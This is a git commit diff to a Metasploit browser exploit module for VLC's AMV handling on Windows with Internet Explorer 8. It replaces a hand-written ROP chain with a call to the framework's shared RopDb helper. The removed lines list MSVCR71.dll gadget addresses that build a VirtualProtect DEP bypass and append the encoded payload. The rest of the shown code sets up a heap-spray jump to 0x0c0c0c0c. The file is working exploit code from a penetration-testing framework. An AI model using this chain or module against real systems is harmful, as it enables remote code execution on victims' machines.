RopDb for vlc_amv.rb

2012-10-05 12:54:16 -05:00 · 2012-10-05 12:54:16 -05:00 · 9a53a49625
parent d9278d82f8
commit 9a53a49625
1 changed files with 2 additions and 37 deletions
--- a/modules/exploits/windows/browser/vlc_amv.rb
+++ b/modules/exploits/windows/browser/vlc_amv.rb
@ -15,6 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = GoodRanking

 	include Msf::Exploit::Remote::HttpServer::HTML
+	include Msf::Exploit::RopDb

 	def initialize(info={})
 		super(update_info(info,
@ -146,43 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		#Generate our payload
 		if my_target['Rop']
 			#IE 8 targets
-			#mona.py tekniq! + Payload
-			code = [
-				0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)
-				0x7c37a140,  # Make EAX readable
-				0x7c37591f,  # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)
-				0x7c348b06,  # EBP (NOP)
-				0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)
-				0x7c37a140,  # <- VirtualProtect() found in IAT
-				0x7c3530ea,  # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)
-				0x7c346c0b,  # Slide, so next gadget would write to correct stack location
-				0x7c376069,  # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)
-				0x7c348b06,  # EDI (filler)
-				0x7c348b06,  # will be patched at runtime (VP), then picked up into ESI
-				0x7c348b06,  # EBX (filler)
-				0x7c376402,  # POP EBP # RETN (msvcr71.dll)
-				0x7c345c30,  # ptr to push esp #  ret  (from MSVCR71.dll)
-				0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)
-				0xfffff82f,  # size 20001 bytes
-				0x7c351e05,  # NEG EAX # RETN (MSVCR71.dll)
-				0x7c354901,  # POP EBX # RETN (MSVCR71.dll)
-				0xffffffff,  # pop value into ebx
-				0x7c345255,  # INC EBX # FPATAN # RETN (MSVCR71.dll)
-				0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)
-				0x7c34d201,  # POP ECX # RETN (MSVCR71.dll)
-				0x7c38b001,  # RW pointer (lpOldProtect) (-> ecx)
-				0x7c34b8d7,  # POP EDI # RETN (MSVCR71.dll)
-				0x7c34b8d8,  # ROP NOP (-> edi)
-				0x7c344f87,  # POP EDX # RETN (MSVCR71.dll)
-				0xffffffc0,  # value to negate, target value : 0x00000040, target: edx
-				0x7c351eb1,  # NEG EDX # RETN (MSVCR71.dll)
-				0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)
-				0x90909090,  # NOPS (-> eax)
-				0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)
-			].pack('V*')
-
-			#Append payload after the ROP chain
-			code << payload.encoded
+			code = generate_rop_payload('java', payload.encoded)

 			#Align and 'jump' to our final payload at 0x0c0c0c0c
 			ini_stage = [